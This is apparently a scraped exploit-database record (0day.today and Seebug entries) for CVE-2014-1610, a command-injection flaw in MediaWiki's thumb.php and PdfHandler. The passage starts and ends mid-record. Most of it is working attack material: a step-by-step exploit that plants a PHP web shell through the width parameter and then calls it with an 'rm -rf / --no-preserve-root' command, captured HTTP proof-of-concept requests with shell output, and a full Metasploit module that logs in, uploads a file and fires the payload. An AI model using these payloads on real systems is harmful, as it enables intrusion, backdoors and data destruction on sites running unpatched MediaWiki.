found\r\n doc = REXML::Document.new found\r\n return doc.root.attributes[value]\r\n end\r\n \r\n ''\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21922"}, {"lastseen": "2018-02-09T05:24:21", "description": "Exploit for multiple platform in category web applications", "edition": 2, "published": "2014-02-02T00:00:00", "type": "zdt", "title": "MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-02T00:00:00", "id": "1337DAY-ID-21844", "href": "https://0day.today/exploit/description/21844", "sourceData": "# Exploit:\r\n####################################################################\r\n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\r\nhttp://vulnerable-site/index.php/Special:Upload\r\n2. inject os cmd to upload a php-backdoor\r\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\r\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\r\n3. access to php-backdoor!\r\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\r\n4. happy pwning!!\r\n \r\n \r\n# Related files:\r\n####################################################################\r\nthumb.php <-- extract all _GET array to params\r\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\r\noptions\r\n/includes/media/ImageHandler.php\r\n/includes/GlobalFunctions.php\r\n/includes/filerepo/file/File.php\r\n \r\n# Vulnerability Analysis:\r\n####################################################################\r\n1. thumb.php\r\nThis script used to resize images if it is configured to be done\r\nwhen the web browser requests the image\r\n<? ...\r\n1.1 Called directly, use $_GET params\r\nwfThumbHandleRequest();\r\n1.2 Handle a thumbnail request via query parameters\r\nfunction wfThumbHandleRequest() {\r\n$params = get_magic_quotes_gpc()\r\n? array_map( 'stripslashes', $_GET )\r\n: $_GET; << WTF\r\n \r\nwfStreamThumb( $params ); // stream the thumbnail\r\n}\r\n1.3 Stream a thumbnail specified by parameters\r\nfunction wfStreamThumb( array $params ) {\r\n...\r\n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts\r\nuploaded.pdf file here\r\n...\r\n// Backwards compatibility parameters\r\nif ( isset( $params['w'] ) ) {\r\n$params['width'] = $params['w']; // << Inject os cmd here!\r\nunset( $params['w'] );\r\n}\r\n...\r\n$img = wfLocalFile( $fileName );\r\n...\r\n// Thumbnail isn't already there, so create the new thumbnail...\r\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\r\nby width/height\r\n...\r\n// Stream the file if there were no errors\r\n$thumb->streamFile( $headers );\r\n...\r\n?>\r\n2. /includes/filerepo/file/File.php\r\n<? ...\r\nfunction transform( $params, $flags = 0 ) { ...\r\n$handler = $this->getHandler(); // << PDF Handler\r\n...\r\n$normalisedParams = $params;\r\n$handler->normaliseParams( $this, $normalisedParams );\r\n...\r\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\r\n..\r\n?>\r\n3. /extensions/PdfHandler/PdfHandler_body.php\r\n<? ...\r\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\r\n...\r\n$width = $params['width'];\r\n...\r\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\r\nparameters\r\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\r\n-dLastPage={$page}\";\r\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\r\n$srcPath );\r\n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor );\r\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\r\nargument\r\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\r\n$cmd .= \" 2>&1\";\r\n...\r\n$err = wfShellExec( $cmd, $retval );\r\n...\r\n?>\r\n4. /includes/GlobalFunctions.php\r\nExecute a shell command, with time and memory limits\r\n<? ...\r\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\r\narray() ) {\r\n...\r\npassthru( $cmd, $retval ); // << Execute here!!\r\n \r\n# Proof-Of-Concept\r\n####################################################################\r\nGET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n \r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\r\n \r\n</p>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n \r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n \r\n \r\n# Back-end $cmd\r\n####################################################################\r\nGlobalFunctions.php : wfShellExec()\r\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\r\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |\r\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\r\nsystem(\\\\$_GET[1]);\">images/longcat.php` -\r\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (GNU/Linux)\r\n \r\niQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU\r\nBzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf\r\nny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1\r\nmijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2\r\nuCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb\r\nGO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv\r\nn2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh\r\nFXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt\r\nvuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ\r\nM0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan\r\nkumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR\r\n2LmeyQR2rzjBB7Sovvcn\r\n=ooEs\r\n-----END PGP SIGNATURE-----\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21844"}, {"lastseen": "2018-01-01T11:12:53", "description": "Exploit for multiple platform in category web applications", "edition": 2, "published": "2014-02-02T00:00:00", "type": "zdt", "title": "MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-02T00:00:00", "id": "1337DAY-ID-21845", "href": "https://0day.today/exploit/description/21845", "sourceData": "####################################################################\r\n#\r\n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)\r\n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability Research Group (Jan 19, 2014)\r\n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)\r\n# Affected website : Wikipedia.org and more !\r\n#\r\n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)\r\n# Release dates : Feb 1, 2014\r\n# Special Thanks to 2600 Thailand !\r\n#\r\n####################################################################\r\n \r\n# Exploit:\r\n####################################################################\r\n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\r\nhttp://vulnerable-site/index.php/Special:Upload\r\n2. inject os cmd to upload a php-backdoor\r\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\r\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\r\n3. access to php-backdoor!\r\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\r\n4. happy pwning!!\r\n \r\n \r\n# Related files:\r\n####################################################################\r\nthumb.php <-- extract all _GET array to params\r\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\r\noptions\r\n/includes/media/ImageHandler.php\r\n/includes/GlobalFunctions.php\r\n/includes/filerepo/file/File.php\r\n \r\n# Vulnerability Analysis:\r\n####################################################################\r\n1. thumb.php\r\nThis script used to resize images if it is configured to be done\r\nwhen the web browser requests the image\r\n<? ...\r\n1.1 Called directly, use $_GET params\r\nwfThumbHandleRequest();\r\n1.2 Handle a thumbnail request via query parameters\r\nfunction wfThumbHandleRequest() {\r\n$params = get_magic_quotes_gpc()\r\n? array_map( 'stripslashes', $_GET )\r\n: $_GET; << WTF\r\n \r\nwfStreamThumb( $params ); // stream the thumbnail\r\n}\r\n1.3 Stream a thumbnail specified by parameters\r\nfunction wfStreamThumb( array $params ) {\r\n...\r\n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts\r\nuploaded.pdf file here\r\n...\r\n// Backwards compatibility parameters\r\nif ( isset( $params['w'] ) ) {\r\n$params['width'] = $params['w']; // << Inject os cmd here!\r\nunset( $params['w'] );\r\n}\r\n...\r\n$img = wfLocalFile( $fileName );\r\n...\r\n// Thumbnail isn't already there, so create the new thumbnail...\r\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\r\nby width/height\r\n...\r\n// Stream the file if there were no errors\r\n$thumb->streamFile( $headers );\r\n...\r\n?>\r\n2. /includes/filerepo/file/File.php\r\n<? ...\r\nfunction transform( $params, $flags = 0 ) { ...\r\n$handler = $this->getHandler(); // << PDF Handler\r\n...\r\n$normalisedParams = $params;\r\n$handler->normaliseParams( $this, $normalisedParams );\r\n...\r\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\r\n..\r\n?>\r\n3. /extensions/PdfHandler/PdfHandler_body.php\r\n<? ...\r\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\r\n...\r\n$width = $params['width'];\r\n...\r\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\r\nparameters\r\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\r\n-dLastPage={$page}\";\r\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\r\n$srcPath );\r\n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor );\r\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\r\nargument\r\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\r\n$cmd .= \" 2>&1\";\r\n...\r\n$err = wfShellExec( $cmd, $retval );\r\n...\r\n?>\r\n4. /includes/GlobalFunctions.php\r\nExecute a shell command, with time and memory limits\r\n<? ...\r\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\r\narray() ) {\r\n...\r\npassthru( $cmd, $retval ); // << Execute here!!\r\n \r\n# Proof-Of-Concept\r\n####################################################################\r\nGET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n \r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\r\n \r\n</p>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n \r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n \r\n \r\n# Back-end $cmd\r\n####################################################################\r\nGlobalFunctions.php : wfShellExec()\r\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\r\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |\r\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\r\nsystem(\\\\$_GET[1]);\">images/longcat.php` -\r\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21845"}], "seebug": [{"lastseen": "2017-11-19T14:53:18", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "MediaWiki Thumb.php - Remote Command Execution", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-85082", "id": "SSV:85082", "sourceData": "\n ##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\r\n 'Description' => %q{\r\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\r\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\r\n users to execute arbitrary commands via shell metacharacters. If no target file\r\n is specified this module will attempt to log in with the provided credentials to\r\n upload a file (.DjVu) to use for exploitation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Netanel Rubin', # from Check Point - Discovery\r\n 'Brandon Perry', # Metasploit Module\r\n 'Ben Harris', # Metasploit Module\r\n 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-1610' ],\r\n [ 'OSVDB', '102630'],\r\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\r\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic PHP-CLI',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "\\r\\n",\r\n 'PrependEncoder' => "php -r \\"",\r\n 'AppendEncoder' => "\\""\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP\r\n }\r\n ],\r\n [ 'Linux CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl python php',\r\n }\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ],\r\n [ 'Windows CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl',\r\n }\r\n },\r\n 'Platform' => ['win'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 28 2014'))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, "Base MediaWiki path", '/mediawiki' ]),\r\n OptString.new('FILENAME', [ false, "Target DjVu/PDF file (e.g target.djvu target.pdf)", nil ]),\r\n OptString.new('USERNAME', [ false, "Username to authenticate with", '' ]),\r\n OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ])\r\n ], self.class)\r\n end\r\n\r\n def get_version(body)\r\n meta_generator = get_html_value(body, 'meta', 'generator', 'content')\r\n\r\n unless meta_generator\r\n vprint_status("No META Generator tag on #{full_uri}.")\r\n return nil, nil, nil\r\n end\r\n\r\n if meta_generator && meta_generator =~ /mediawiki/i\r\n vprint_status("#{meta_generator} detected.")\r\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\r\n major = $1.to_i\r\n minor = $2.to_i\r\n patch = $3.to_i\r\n vprint_status("Major:#{major} Minor:#{minor} Patch:#{patch}")\r\n\r\n return major, minor, patch\r\n end\r\n\r\n return nil, nil, nil\r\n end\r\n\r\n def check\r\n uri = target_uri.path\r\n\r\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\r\n\r\n response = send_request_cgi!(opts)\r\n\r\n if opts['redirect_uri']\r\n vprint_status("Redirected to #{opts['redirect_uri']}.")\r\n end\r\n\r\n unless response\r\n vprint_status("No response from #{full_uri}.")\r\n return CheckCode::Unknown\r\n end\r\n\r\n # Mediawiki will give a 404 for unknown pages but still have a body\r\n if response.code == 200 || response.code == 404\r\n vprint_status("#{response.code} response received...")\r\n\r\n major, minor, patch = get_version(response.body)\r\n\r\n unless major\r\n return CheckCode::Unknown\r\n end\r\n\r\n if major == 1 && (minor < 8 || minor > 22)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 22 && patch > 1)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 21 && patch > 4)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 19 && patch > 10)\r\n return CheckCode::Safe\r\n elsif major == 1\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n vprint_status("Received response code #{response.code} from #{full_uri}")\r\n CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n uri = target_uri.path\r\n\r\n print_status("Grabbing version and login CSRF token...")\r\n response = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'vars_get' => { 'title' => 'Special:UserLogin' }\r\n })\r\n\r\n unless response\r\n fail_with(Failure::NotFound, "Failed to retrieve webpage.")\r\n end\r\n\r\n server = response['Server']\r\n if server && target.name =~ /automatic/i && server =~ /win32/i\r\n vprint_status("Windows platform detected: #{server}.")\r\n my_platform = Msf::Module::Platform::Windows\r\n elsif server && target.name =~ /automatic/i\r\n vprint_status("Nix platform detected: #{server}.")\r\n my_platform = Msf::Module::Platform::Unix\r\n else\r\n my_platform = target.platform.platforms.first\r\n end\r\n\r\n # If we have already identified a DjVu/PDF file on the server trigger\r\n # the exploit\r\n unless datastore['FILENAME'].blank?\r\n payload_request(uri, datastore['FILENAME'], my_platform)\r\n return\r\n end\r\n\r\n username = datastore['USERNAME']\r\n password = datastore['PASSWORD']\r\n\r\n major, minor, patch = get_version(response.body)\r\n\r\n # Upload CSRF added in v1.18.2\r\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\r\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\r\n upload_csrf = false\r\n elsif ((major == 1) && (minor < 18))\r\n upload_csrf = false\r\n else\r\n upload_csrf = true\r\n end\r\n\r\n session_cookie = response.get_cookies\r\n\r\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\r\n\r\n if wp_login_token.blank?\r\n fail_with(Failure::UnexpectedReply, "Couldn't find login token. Is URI set correctly?")\r\n else\r\n print_good("Retrieved login CSRF token.")\r\n end\r\n\r\n print_status("Attempting to login...")\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'method' => 'POST',\r\n 'vars_get' => {\r\n 'title' => 'Special:UserLogin',\r\n 'action' => 'submitlogin',\r\n 'type' => 'login'\r\n },\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'wpName' => username,\r\n 'wpPassword' => password,\r\n 'wpLoginAttempt' => 'Log in',\r\n 'wpLoginToken' => wp_login_token\r\n }\r\n })\r\n\r\n if login and login.code == 302\r\n print_good("Log in successful.")\r\n else\r\n fail_with(Failure::NoAccess, "Failed to log in.")\r\n end\r\n\r\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\r\n\r\n # Testing v1.15.1 it looks like it has session fixation\r\n # vulnerability so we dont get a new session cookie after\r\n # authenticating. Therefore we need to include our old cookie.\r\n unless auth_cookie.include? 'session='\r\n auth_cookie << session_cookie\r\n end\r\n\r\n print_status("Getting upload CSRF token...") if upload_csrf\r\n upload_file = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'cookie' => auth_cookie\r\n })\r\n\r\n unless upload_file and upload_file.code == 200\r\n fail_with(Failure::NotFound, "Failed to access file upload page.")\r\n end\r\n\r\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\r\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\r\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\r\n\r\n if upload_csrf && wp_edit_token.blank?\r\n fail_with(Failure::UnexpectedReply, "Couldn't find upload token. Is URI set correctly?")\r\n elsif upload_csrf\r\n print_good("Retrieved upload CSRF token.")\r\n end\r\n\r\n upload_mime = Rex::MIME::Message.new\r\n\r\n djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1610", "metasploit.djvu"))\r\n file_name = "#{rand_text_alpha(4)}.djvu"\r\n\r\n upload_mime.add_part(djvu_file, "application/octet-stream", "binary", "form-data; name=\\"wpUploadFile\\"; filename=\\"#{file_name}\\"")\r\n upload_mime.add_part("#{file_name}", nil, nil, "form-data; name=\\"wpDestFile\\"")\r\n upload_mime.add_part("#{rand_text_alpha(4)}", nil, nil, "form-data; name=\\"wpUploadDescription\\"")\r\n upload_mime.add_part("", nil, nil, "form-data; name=\\"wpLicense\\"")\r\n upload_mime.add_part("1",nil,nil, "form-data; name=\\"wpIgnoreWarning\\"")\r\n upload_mime.add_part(wp_edit_token, nil, nil, "form-data; name=\\"wpEditToken\\"") if upload_csrf\r\n upload_mime.add_part(title, nil, nil, "form-data; name=\\"title\\"")\r\n upload_mime.add_part("1", nil, nil, "form-data; name=\\"wpDestFileWarningAck\\"")\r\n upload_mime.add_part(wp_upload, nil, nil, "form-data; name=\\"wpUpload\\"")\r\n post_data = upload_mime.to_s\r\n\r\n print_status("Uploading DjVu file #{file_name}...")\r\n\r\n upload = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'data' => post_data,\r\n 'ctype' => "multipart/form-data; boundary=#{upload_mime.bound}",\r\n 'cookie' => auth_cookie\r\n })\r\n\r\n if upload and upload.code == 302 and upload.headers['Location']\r\n location = upload.headers['Location']\r\n print_good("File uploaded to #{location}")\r\n else\r\n if upload.body.include? 'not a permitted file type'\r\n fail_with(Failure::NotVulnerable, "Wiki is not configured for target files.")\r\n else\r\n fail_with(Failure::UnexpectedReply, "Failed to upload file.")\r\n end\r\n end\r\n\r\n payload_request(uri, file_name, my_platform)\r\n end\r\n\r\n def payload_request(uri, file_name, my_platform)\r\n if my_platform == Msf::Module::Platform::Windows\r\n trigger = "1)&(#{payload.encoded})&"\r\n else\r\n trigger = "1;#{payload.encoded};"\r\n end\r\n\r\n vars_get = { 'f' => file_name }\r\n if file_name.include? '.pdf'\r\n vars_get['width'] = trigger\r\n elsif file_name.include? '.djvu'\r\n vars_get['width'] = 1\r\n vars_get['p'] = trigger\r\n else\r\n fail_with(Failure::BadConfig, "Unsupported file extension: #{file_name}")\r\n end\r\n\r\n print_status("Sending payload request...")\r\n r = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'thumb.php'),\r\n 'vars_get' => vars_get\r\n }, 1)\r\n\r\n if r && r.code == 404 && r.body =~ /not exist/\r\n print_error("File: #{file_name} does not exist.")\r\n elsif r\r\n print_error("Received response #{r.code}, exploit probably failed.")\r\n end\r\n end\r\n\r\n # The order of name, value keeps shifting so regex is painful.\r\n # Cant use nokogiri due to security issues\r\n # Cant use REXML directly as its not strict XHTML\r\n # So we do a filthy mixture of regex and REXML\r\n def get_html_value(html, type, name, value)\r\n return nil unless html\r\n return nil unless type\r\n return nil unless name\r\n return nil unless value\r\n\r\n found = nil\r\n html.each_line do |line|\r\n if line =~ /(<#{type}[^\\/]*name="#{name}".*?\\/>)/i\r\n found = $&\r\n break\r\n end\r\n end\r\n\r\n if found\r\n doc = REXML::Document.new found\r\n return doc.root.attributes[value]\r\n end\r\n\r\n ''\r\n end\r\nend\r\n\n ", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-85082"}, {"lastseen": "2017-11-19T17:34:30", "description": "CVE ID:CVE-2014-1610\r\n\r\nMediaWiki\u662f\u7f8e\u56fd\u7ef4\u57fa\u5a92\u4f53\uff08Wikimedia\uff09\u57fa\u91d1\u4f1a\u548cMediaWiki\u5fd7\u613f\u8005\u5171\u540c\u5f00\u53d1\u7ef4\u62a4\u7684\u4e00\u5957\u81ea\u7531\u514d\u8d39\u7684\u57fa\u4e8e\u7f51\u7edc\u7684Wiki\u5f15\u64ce\uff0c\u5b83\u53ef\u7528\u4e8e\u90e8\u7f72\u5185\u90e8\u7684\u77e5\u8bc6\u7ba1\u7406\u548c\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf\u3002 \r\n\r\nMediaWiki\u4e2d\u5b58\u5728\u8f93\u5165\u9a8c\u8bc1\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8ethumb.php\u811a\u672c\u6ca1\u6709\u6b63\u786e\u8fc7\u6ee4\u2018page\u2019\u53c2\u6570\u3002\u5f53\u542f\u7528\u652f\u6301\u4e0a\u4f20DjVu\u6216PDF\u6587\u4ef6\u65f6\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u501f\u52a9\u7279\u5236\u7684shell\u5143\u5b57\u7b26\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\u4ee5\u4e0b\u7248\u672c\u53d7\u5230\u5f71\u54cd\uff1aMediaWiki 1.22.2\u4e4b\u524d\u76841.22.x\u7248\u672c\uff0c1.21.5\u4e4b\u524d\u76841.21.x\u7248\u672c\uff0c1.19.11\u4e4b\u524d\u76841.19.x\u7248\u672c\u3002\n0\nMediaWiki <= 1.22.1\r\nMediaWiki <= 1.21.4\r\nMediaWiki <= 